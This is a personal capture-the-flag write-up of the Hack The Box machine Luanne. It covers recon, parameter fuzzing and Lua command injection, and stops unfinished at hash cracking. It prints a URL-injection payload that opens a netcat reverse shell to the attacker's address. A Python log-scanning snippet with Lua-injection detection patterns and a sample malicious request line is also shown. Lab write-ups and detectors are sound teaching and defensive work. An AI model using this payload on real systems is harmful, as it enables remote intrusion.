Luanne ~ Hack The Box

CTFs Feb 14, 2021

Prerequisite

To make life easier, I usually add an entry to my hosts file so the target machine can be reached by name.

echo "10.10.10.215	luanne.htb" >> /etc/hosts
hosts file entry

Okay now onto the hacking!


Reconnaissance

As always, I started off with an Nmap scan against the machine.

nmap -Pn -sC -sV -oN initial luanne.htb

Scanning & Enumeration

The scan showed that port 80 was running a web server. This was the web app that was being served!

I was not authorized to access the site. However, I found a directory listed in robots.txt.

Thus, I ran a directory brute-force attack against it using gobuster.

I found that /weather/forecast was a valid directory.

Accessing it gave me this message. From it I inferred the expected parameter and added it to the URL.

My next order of business was to run a parameter fuzz attack on ?city=. I used an Intruder attack from Burp Suite for that. I also used a custom fuzz list which I found over at GitHub.

The fuzz attack revealed that the weather endpoint was a .lua script. That made me wonder whether I could get remote code execution by tampering with the parameter.

Exploitation

The first step was to confirm whether the theory would work. For that, I used a simple payload to run the command whoami.

Now that I had confirmed that I had RCE, it was time to craft a payload to get a reverse shell. After constructing the payload, I had to URL-encode it.

neewashere') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.47 666 >/tmp/f')--

While doing enumeration, I had uncovered that the machine was running NetBSD. Thus, I picked an OpenBSD-style netcat reverse shell which I found here.
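As an added defender-side example (not part of the original writeup), the following Python scans constructed web access-log lines for the kind of Lua string breakout in the city parameter shown above; the log format, the sample lines and the injection patterns are my assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the original post). The third
# request carries a URL-encoded Lua breakout in the city parameter.
SAMPLE_LOG = """\
10.10.14.47 - - [14/Feb/2021:10:01:02 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 512
10.10.14.47 - - [14/Feb/2021:10:01:09 +0000] "GET /weather/forecast?city=Paris HTTP/1.1" 200 498
10.10.14.47 - - [14/Feb/2021:10:02:31 +0000] "GET /weather/forecast?city=x%27%29%20os.execute%28%27id%27%29-- HTTP/1.1" 500 0
"""

# Common/combined log format (assumed): client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Markers of a Lua string/call breakout that no real city name contains: a
# closing quote followed by ')', a trailing '--' line comment, or a call into
# the os/io/load APIs.
INJECTION_RE = re.compile(
    r"""['"]\s*\)|--\s*$|\b(?:os\.execute|io\.popen|load(?:string)?)\s*\("""
)


def find_lua_injection(log_text, param="city"):
    """Return (ip, timestamp, decoded value) for requests whose `param`
    value looks like a Lua breakout. parse_qs URL-decodes the values
    before matching, so encoded payloads are caught as well."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m["target"]).query
        params = parse_qs(query, keep_blank_values=True)
        for value in params.get(param, []):
            if INJECTION_RE.search(value):
                hits.append((m["ip"], m["ts"], value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in find_lua_injection(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious city={value!r}")
```

Only the third request is flagged; the two plain city names pass through untouched.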

Lateral Movement

Now that I had a shell on the machine, I busted out linpeas.sh and tried to enumerate the machine further.

LinPEAS revealed a password hash located in the web root directory.

Next up, I fired up john to try and crack the password.

Still trying to crack :(

Privilege Escalation

Haven't even gotten the user flag :(
